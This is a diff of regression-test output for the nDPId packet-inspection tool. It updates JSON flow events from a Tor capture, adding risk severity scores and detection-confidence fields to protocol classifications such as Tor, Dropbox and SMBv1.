 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","16":"Suspicious DGA domain name","22":"Unsafe Protocol"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
+01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821670213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821672213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1383821673254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"ts_msec":1383821673254,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821674212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821676212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -56,7 +56,7 @@
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":96,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00713{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1383821693159,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"ts_msec":1383821693159,"pkt":"\/\/\/\/\/\/\/\/UlQAWul3CABFAADuA4EAAIARsTLAqAH8wKgB\/wCKAIoA2itVEQLJT8CoAfwAigDEAAAgRUZFT0VFRUpFQkVPQ05GQUVEQ0FDQUNBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAKgAAAAAAAAAAAOgDAAAAAAAAAAAqAFYAAwABAAEAAgA7AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABFTkRJQU4tUEMA"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821694212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00161{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00351{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821696212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -131,7 +131,7 @@
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1124,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1204,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821762212,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1204,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
-00650{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383821673254,"flow_last_seen":1383821763366,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383821764213,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383821673254,"flow_last_seen":1383821763366,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383821764213,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1389,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821764213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1389,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1540,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821766213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
@@ -152,21 +152,21 @@
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1830,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821782213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1831,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
-00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383821784213,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383821784213,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821784213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1832,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
 00353{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1383821786213,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1833,"source":"tor.pcap","alias":"nDPId-test","layer_type":38}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383821673254,"flow_last_seen":1383821763366,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1383821673254,"flow_last_seen":1383821763366,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":180000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
 00567{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1834,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1383822123915,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
